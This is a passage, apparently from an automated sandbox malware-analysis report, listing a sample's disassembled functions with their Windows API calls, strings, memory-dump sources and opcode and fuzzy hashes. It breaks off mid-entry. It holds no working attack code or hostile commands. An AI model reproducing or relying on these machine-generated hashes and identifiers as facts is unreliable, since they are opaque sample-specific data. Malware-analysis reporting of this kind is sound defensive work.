                                                                                • Source File: 00000003.00000001.650151435.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000001.650532404.0000000000459000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000003.00000001.650563628.000000000045D000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000003.00000001.650585154.0000000000473000.00000040.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: d
                                                                                • API String ID: 0-2564639436
                                                                                • Opcode ID: c4486d57b002c4a17651f1dff0e5a28715170e5811b961ad68c99a8578c6597b
                                                                                • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                • Opcode Fuzzy Hash: c4486d57b002c4a17651f1dff0e5a28715170e5811b961ad68c99a8578c6597b
                                                                                • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041EED2, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: memset
                                                                                • String ID: BINARY
                                                                                • API String ID: 2221118986-907554435
                                                                                • Opcode ID: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                                                                • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                • Opcode Fuzzy Hash: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                                                                • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004104FB, Relevance: 3.1, APIs: 2, Instructions: 140COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                                                • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                                                                • FindCloseChangeNotification.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                                                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                  • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                  • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                                                                • String ID:
                                                                                • API String ID: 1161345128-0
                                                                                • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004104FB, Relevance: 3.1, APIs: 2, Instructions: 107COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000001.650151435.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000001.650532404.0000000000459000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000003.00000001.650563628.000000000045D000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000003.00000001.650585154.0000000000473000.00000040.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Handle
                                                                                • String ID:
                                                                                • API String ID: 2519475695-0
                                                                                • Opcode ID: 73cd884fcc8b38511e0af6fc2f120c32e50b8381168b3349c14b18d49478f583
                                                                                • Instruction ID: 01fb2f4c7f9db48d7e163a5174566799cda3591881a23e576d5b37fad0c5c789
                                                                                • Opcode Fuzzy Hash: 73cd884fcc8b38511e0af6fc2f120c32e50b8381168b3349c14b18d49478f583
                                                                                • Instruction Fuzzy Hash: 43315C31700104EFCB219F69C888A9EB7B6EF95711F21445BF40697291CBB89DC0CF59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041268E, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: _wcsicmp
                                                                                • String ID: /stext
                                                                                • API String ID: 2081463915-3817206916
                                                                                • Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                • Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040CC26, Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                                                                                • String ID:
                                                                                • API String ID: 159017214-0
                                                                                • Opcode ID: 8476b2a334a6ca3796266775e65a8fd449818afe434cc52dae5eff682d065e7e
                                                                                • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                • Opcode Fuzzy Hash: 8476b2a334a6ca3796266775e65a8fd449818afe434cc52dae5eff682d065e7e
                                                                                • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004152C6, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000001.650151435.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000001.650532404.0000000000459000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000003.00000001.650563628.000000000045D000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000003.00000001.650585154.0000000000473000.00000040.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: malloc
                                                                                • String ID: failed to allocate %u bytes of memory
                                                                                • API String ID: 2803490479-1168259600
                                                                                • Opcode ID: d46df68a33096bc5ecf56bac9fc7fa9738457104c94458a0d64695529559d2c3
                                                                                • Instruction ID: ac174bc7eeb967863c2d13bc85a72e2692184822635697770113ba02b022680b
                                                                                • Opcode Fuzzy Hash: d46df68a33096bc5ecf56bac9fc7fa9738457104c94458a0d64695529559d2c3
                                                                                • Instruction Fuzzy Hash: B9E0D8B7F01A2293C200561AEC0198667959FC12217170537F96CD3680D638D855C7B9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004152C7, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 26COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: malloc
                                                                                • String ID: failed to allocate %u bytes of memory
                                                                                • API String ID: 2803490479-1168259600
                                                                                • Opcode ID: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                                                • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                                                                                • Opcode Fuzzy Hash: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                                                • Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040B1AB, Relevance: 3.0, APIs: 2, Instructions: 14COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                • Opcode ID: 3e003a951d4b795c2795be91072552c134f268f2eb67798ac8aad6e8ea3cca53
                                                                                • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                • Opcode Fuzzy Hash: 3e003a951d4b795c2795be91072552c134f268f2eb67798ac8aad6e8ea3cca53
                                                                                • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040B0B5, Relevance: 3.0, APIs: 2, Instructions: 7COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                • Opcode ID: 10fc877065b6e48d7bdc99d18b4a7e13807bbdb0444c9cb367cecc131ffa056e
                                                                                • Instruction ID: 93a37c1a4f050773dc1a5674df64ec50811fc8a39a1cc3e4a9db11821b00e242
                                                                                • Opcode Fuzzy Hash: 10fc877065b6e48d7bdc99d18b4a7e13807bbdb0444c9cb367cecc131ffa056e
                                                                                • Instruction Fuzzy Hash: A0B012310281004DEB057BA1B8061142302C64332E3B3413FE000500A3DE5D6034140F
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041BC3B, Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: memcmpmemset
                                                                                • String ID:
                                                                                • API String ID: 1065087418-0
                                                                                • Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                                • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                • Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                                • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00418C63, Relevance: 2.6, APIs: 2, Instructions: 132COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: memset
                                                                                • String ID:
                                                                                • API String ID: 2221118986-0
                                                                                • Opcode ID: 91f73f7a852cbb4360dbb9cf7f888a1e4609bdf8e01f9823d17442fd23f8c43f
                                                                                • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                                • Opcode Fuzzy Hash: 91f73f7a852cbb4360dbb9cf7f888a1e4609bdf8e01f9823d17442fd23f8c43f
                                                                                • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040B2F5, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000FFF,00000000,00000000), ref: 0040B348
                                                                                  • Part of subcall function 00415427: Sleep.KERNEL32(0040B35A,?), ref: 00415433
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000001.650151435.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000001.650532404.0000000000459000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000003.00000001.650563628.000000000045D000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000003.00000001.650585154.0000000000473000.00000040.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ByteCharMultiSleepWide
                                                                                • String ID:
                                                                                • API String ID: 1884586056-0
                                                                                • Opcode ID: 7a8a24680d270721be8ae4d058aa4e42bdba85cb1fc8c0404b183b4d1689a31b
                                                                                • Instruction ID: d31688a2c0915e37bd8cdc94656e18521ca9392021a2a33f6ebdeb55e6ec5189
                                                                                • Opcode Fuzzy Hash: 7a8a24680d270721be8ae4d058aa4e42bdba85cb1fc8c0404b183b4d1689a31b
                                                                                • Instruction Fuzzy Hash: 3621F371900218BFC7109B98EC84C9937A8EB4532AF10827BF845A3292D6B8DD989B5D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00403988, Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                  • Part of subcall function 0040A02C: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                  • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                  • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                • String ID:
                                                                                • API String ID: 2154303073-0
                                                                                • Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                                • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                • Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                                • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004135F7, Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                • String ID:
                                                                                • API String ID: 3150196962-0
                                                                                • Opcode ID: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                                                                • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                • Opcode Fuzzy Hash: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                                                                • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00414561, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                  • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                • String ID:
                                                                                • API String ID: 4232544981-0
                                                                                • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00444A54, Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID:
                                                                                • API String ID: 3664257935-0
                                                                                • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00413F27, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AddressProc$FileModuleName
                                                                                • String ID:
                                                                                • API String ID: 3859505661-0
                                                                                • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040A2EF, Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FileRead
                                                                                • String ID:
                                                                                • API String ID: 2738559852-0
                                                                                • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040A30E, Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FileWrite
                                                                                • String ID:
                                                                                • API String ID: 3934441357-0
                                                                                • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
